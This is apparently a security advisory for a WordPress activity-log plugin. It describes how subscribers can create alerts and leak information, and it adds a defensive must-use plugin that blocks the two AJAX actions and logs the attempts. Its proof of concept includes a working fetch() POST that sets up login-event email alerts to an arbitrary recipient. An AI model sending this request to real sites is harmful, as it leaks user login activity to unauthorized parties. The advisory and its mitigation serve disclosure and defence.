The plugin does not prevent low-privileged users on the site (such as subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.
Step 1: Log in as a subscriber
Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications
Step 3: Configure the alerts via:
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "method": "POST",
  "body": "action=save_new_alert&wp_stream_alerts_nonce=XXXX&wp_stream_trigger_author=&wp_stream_trigger_context=users-sessions&wp_stream_trigger_action=login&wp_stream_alert_type=email&wp_stream_alert_status=wp_stream_enabled&wp_stream_email_recipient=recipient%40example.com&wp_stream_email_subject=test",
});
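
One way to close this gap on a site that cannot update yet, as an added example that is not the plugin's own code: a must-use plugin that rejects the two AJAX actions named in the steps above unless the caller holds an administrative capability. The required capability (manage_options), the example_ names, and the premise that the plugin registers its handlers at a priority later than 0 are assumptions.

```php
<?php
/**
 * Plugin Name: Example alert AJAX guard
 * Description: Added example, not part of the affected plugin. Place in wp-content/mu-plugins/.
 */

// AJAX actions taken from the proof of concept above.
const EXAMPLE_GUARDED_ACTIONS = array(
	'get_new_alert_triggers_notifications', // hands out the nonce (Step 2)
	'save_new_alert',                       // creates the alert (Step 3)
);

// Assumption: only administrators should be able to manage alerts.
const EXAMPLE_REQUIRED_CAP = 'manage_options';

/**
 * Runs before the plugin's own handler. A valid nonce only proves the request
 * came from a logged-in session; it says nothing about what that user may do,
 * so the capability is checked explicitly here.
 */
function example_alert_guard() {
	if ( current_user_can( EXAMPLE_REQUIRED_CAP ) ) {
		return; // Authorized: fall through to the plugin's handler.
	}

	// Leave a trace for detection: which account tried which action, from where.
	$remote = isset( $_SERVER['REMOTE_ADDR'] )
		? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
		: 'unknown';
	error_log( sprintf(
		'alert-guard: denied %s for user_id=%d ip=%s',
		current_action(),
		get_current_user_id(),
		$remote
	) );

	// Sends a JSON error with HTTP 403 and terminates the request.
	wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
}

// Priority 0 so the guard fires ahead of handlers registered at the default 10.
foreach ( EXAMPLE_GUARDED_ACTIONS as $example_action ) {
	add_action( 'wp_ajax_' . $example_action, 'example_alert_guard', 0 );
}
```

The denied-request log lines also give a simple signal to review: a subscriber account hitting either action has no legitimate reason to do so.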